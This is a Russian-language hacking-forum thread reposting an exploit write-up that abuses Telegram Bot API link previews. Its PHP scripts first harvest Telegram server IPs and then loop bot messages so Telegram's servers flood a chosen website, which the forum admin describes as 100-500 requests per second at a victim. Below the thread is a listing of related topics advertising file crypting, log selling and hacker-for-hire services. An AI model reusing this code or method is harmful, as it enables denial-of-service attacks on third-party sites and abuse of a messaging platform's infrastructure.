Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin · 29.11.2016

Код:

###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4

dkfancska · 29.11.2016

Admin сказал(а):

Код:

###########################

# Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

###########################

# Exploit Title : Telegram Bot API CSRF Vulnerability and use it as a ddoser
# Exploit Author : 4L1R3Z4
# Date : 2016/08/15
# Google Dork : No
# Home Page : https://core.telegram.org/bots/api
# Category : Web Application
# Discovered by : 4L1R3Z4
==============================
# Description :
==============================
In new version of telegram bot api, a new object called "MessageEntity" permits you that send Urls as
message. By this object, We can achieve GET request from telegram server.
Telegram doesn't check that the image is real or not, and also it doesn't have a captcha or securtiy token
so we can run our php files through Telegram Server
==============================
# Proof Of Concepts :
==============================
In this section, I'll show you that how you can grab telegram Server IP
create a folder named "tg" on your host and create a .htaccess file in that with the following contents:
-------------
ErrorDocument 404 /tg/log.php
-------------
And this is the "log.php":
--------------------------------------------
<?php
function getUserIP()
{
  $client  = @$_SERVER['HTTP_CLIENT_IP'];
  $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
  $remote  = $_SERVER['REMOTE_ADDR'];
  if(filter_var($client, FILTER_VALIDATE_IP))
  {
  $ip = $client;
  }
  elseif(filter_var($forward, FILTER_VALIDATE_IP))
  {
  $ip = $forward;
  }
  else
  {
  $ip = $remote;
  }
  return $ip. PHP_EOL;
}
$user_ip = getUserIP();
$logfile= 'log.txt';
$fp = fopen($logfile, "a");
fwrite($fp, $user_ip, strlen($user_ip));
fclose($fp);
?>
----------------------------------------------
and a file called "request.php" with this contets:
-----------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
?>
-------------------------
Then activate WebHook for you bot and set the "request.php" address for web hook,
Then, Send a message to your bot, if you do everything right, the IP will write on "log.txt" file


************
************ Exploiting it to ddos
************

Change request.php with this:
--------------------------------------------
<?php
function random_string($length) {
  $key = '';
  $keys = array_merge(range(0, 9), range('a', 'z'));
  for ($i = 0; $i < $length; $i++) {
  $key .= $keys[array_rand($keys)];
  }
  return $key;
}
$update = json_decode(file_get_contents('php://input'));
for($i=0;$i<100;$i++){
$rep=json_decode(file_get_contents("https://api.telegram.org/bot[YOUR BOT Token]/SendMessage?chat_id=".$update->message->chat->id."&parse_mode=HTML&text=".urldecode("<a href=\"https://YOUR HOST.com/tg/".random_string(50).".png\">".'test'."</a>")));
}
?>
--------------------------------------------

and change log.php with this:

--------------------------------------------
<?php
echo file_get_contents("http://exampledomain.com");
?>
---------------------------------------------

This code will send 100 requests to "exampledomain.com" from telegram IP
You can increase or decrease the request numbers depending on your server features
Also you can exploit it through IRC servers if your server is not strong.


Exploited by 4L1R3Z4

А можно поподробнее что с этим делать

HATRED · 30.11.2016

+ тоже интересно

Admin · 30.11.2016

В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.

HATRED · 02.12.2016

Admin сказал(а):
В новой версии телеграма бот API, новый объект под названием "MessageEntity" позволяет Вам, отправить Urls
сообщения. К этому объекту, мы можем посылать запрос GET из телеграм сервера.
Телеграм не проверяет, изображение реально или нет, а также он не имеет капчи и секьюрити токена, так что мы можем запустить наши PHP файлы через Телеграм сервер и посылаем на сайт жертвы около 100-500 запросов в секунду.

спасибо за ответ

Автор	Заголовок	Раздел	Ответы	Дата
	✅USMobileSMSBot - Telegram Bot (24/7) SMS ВЕРИФИКАЦИИ НА РЕАЛЬНЫЕ НОМЕРА USA ОДНОРАЗОВАЯ И ДОЛГОСРОЧНАЯ АРЕНДА Non-VoIP.	Ищу работу. Предлагаю свои услуги.	0	23.06.2024
C	Крипт за €15 \| Fryp Files ~ €15 - Telegram BOT: @cryptmodebot \| Auto Crypt Files 24/7	Ищу работу. Предлагаю свои услуги.	0	06.01.2021
B	Разработаю️ ▷Создам Телеграм/VK Бота ▷ ️ Creat Telegram/VKontakte Bot	Ищу работу. Предлагаю свои услуги.	0	02.02.2020
B	Проверено [МАГАЗИН] Telegram Bot Logs Seller	Финансы - биллинги, банки, кошельки, логи	0	05.09.2019
N	Telegram bot (ИНТЕРАКТИВНАЯ ТЕМА ДЛЯ ОБЩЕГО ЗАРАБОТКА).	Способы заработка	2	18.11.2018
S	[PHP] Telegram Bot	Другие ЯП	3	15.08.2018
	25 000 за воздух: как «таможенники» из Telegram разводят на доверии	Новости в сети	0	11.04.2025
	Установил Telegram? Поздравляем, теперь у тебя есть куратор из Китая	Новости в сети	0	10.04.2025
	Двойники Telegram захватили сеть: миллион пользователей на крючке	Новости в сети	0	19.02.2025
	Проверено Продвижение в Telegram, Инвайт, Рассылка по Чатам, Реклама в Чатах	Услуги дизайнеров/веб-разработчиков	0	08.02.2025
	Фейковая «Безопасность»: Telegram-аккаунты снова крадут через сообщения	Новости в сети	0	06.02.2025
	GhostGPT: как Telegram-бот из новичков делает профи криминального ИИ	Новости в сети	1	27.01.2025
	Лучшие OSINT боты в Telegram 2025	OSINT	0	20.01.2025
	Telegram передал правоохранительным органам США данные о тысячах пользователей	Новости в сети	2	08.01.2025
	Тайна 28 000 каналов: Telegram становится трибуной для экстремистов	Новости в сети	0	18.12.2024
	$50 млн за вечер: Telegram стал ключом к Radiant Capital	Новости в сети	0	11.12.2024
	DDoS на заказ: как Matrix монетизирует крупнейшую ботнет-сеть через Telegram	Новости в сети	0	28.11.2024
	Подделка на $235 млн: один Telegram-аккаунт обрушил криптобиржу WazirX	Новости в сети	0	16.11.2024
	Ожидает оплаты Рассылки в ЛС WhatsApp / Telegram / Viber / ВКонтакте	Ищу работу. Предлагаю свои услуги.	0	31.10.2024
	Открытые каналы, закрытые дела: как преступники сами себя разоблачают в Telegram	Новости в сети	0	01.10.2024
	Star Health против Telegram: Хакеры, боты и миллионы украденных историй болезней	Новости в сети	0	30.09.2024
	Важно!!! Дуров: данные пользователей Telegram могут предоставляться органам по запросу	Новости в сети	4	23.09.2024
	Telegram vs приватность: как киберпреступники случайно выдают свои личности	Новости в сети	0	21.09.2024
	Teletoken: Telegram-боты больше не анонимны	Новости в сети	0	12.09.2024
	Продам Atq-store.com - Аккаунты Telegram (Session + Json, Tdata).	Аккаунты/Админки/Документы	1	09.09.2024
	Мир теней: Telegram и опенсорс - лидеры скрытых атак	Новости в сети	0	05.09.2024
	Мифы о нейтралитете платформ: Как Telegram оказался под прицелом за пособничество преступлениям	Новости в сети	0	03.09.2024
	Двойная игра Дурова: как создатель Telegram тайно сотрудничал со спецслужбами	Новости в сети	0	02.09.2024
	Криптоимперия Huione: $49 млрд между властью Камбоджи и даркнетом Telegram	Новости в сети	0	01.09.2024
	«Люди рядом» исчезли из Telegram после ареста Дурова	Новости в сети	0	01.09.2024
	Signal vs Telegram: Ваши секреты в опасности. Выбор может стоить дорого	Новости в сети	1	30.08.2024
	Анализ Telegram: Защищенный мессенджер или опасное заблуждение?	Новости в сети	0	29.08.2024
	Силовикам РФ поручили очистить Telegram-чаты	Новости в сети	0	28.08.2024
	Telegram на грани: арест Дурова ставит под угрозу будущее мессенджера	Новости в сети	0	28.08.2024
	Новый вирус захватывает Telegram и крадёт криптовалюту	Новости в сети	0	19.08.2024
E	На проверке Заказать услуги профессионального хакера от [email protected] - решение проблем по взлому (Whatsapp,Viber,Telegram,ВКонтакте,Instagram,Facebook)	Ищу работу. Предлагаю свои услуги.	1	08.08.2024
	Telegram + Web3: Дуров бросает вызов традиционному вебу	Новости в сети	0	02.08.2024
	СМС-стилеры в Telegram: тысячи пользователей стали жертвами атак	Новости в сети	0	12.07.2024
	IT-вакансия в Telegram? Проверьте дважды, а то останетесь без денег	Новости в сети	0	01.07.2024
	Hamster Kombat: хомяки в Telegram могут угрожать вашему кошельку и детской психике	Новости в сети	0	21.06.2024
	Режим бога за $1,5 млн: поддельные копии Pegasus заполонили Telegram	Новости в сети	0	24.05.2024
	Война мессенджеров: Signal и Telegram устроили в соцсетях битву за безопасность	Новости в сети	0	13.05.2024
	Ожидает оплаты Разработка Telegram ботов + САЙТОВ + СДАЧА ПРОЕКТОВ В АРЕНДУ	Ищу работу. Предлагаю свои услуги.	0	23.04.2024
	Telegram устранил 0day, используемый для удаленного запуска кода	Новости в сети	0	15.04.2024
	Опасная сеть SVO_Free: мошенники в Шереметьево воруют Telegram-аккаунты	Новости в сети	0	08.04.2024
	[Тренд+] Рассылка в Telegram с последующим ЛИЧНЫМ общением!	Ищу работу. Предлагаю свои услуги.	2	06.04.2024
H	[ FREE ] Бот отрисовщик в Telegram	Другое	6	21.02.2024
	Статья Как получают привязанный к Telegram мобильный номер.	Анонимность и приватность	0	09.02.2024
	[Telegram +] Рассылка/Инвайтинг в Телеграм. [+] Множество отзывов с форумов!	Ищу работу. Предлагаю свои услуги.	4	12.01.2024
	Закрыто Обучение: рассылкам\инвайту\регистрации и другому в Telegram. В среднем проф спамеры зарабатывают от 2000$+	Ищу работу. Предлагаю свои услуги.	4	12.01.2024

Telegram Bot API Cross Site Request Forgery / Denial Of Service Vulnerability

Admin

dkfancska

HATRED

Admin

HATRED

Название темы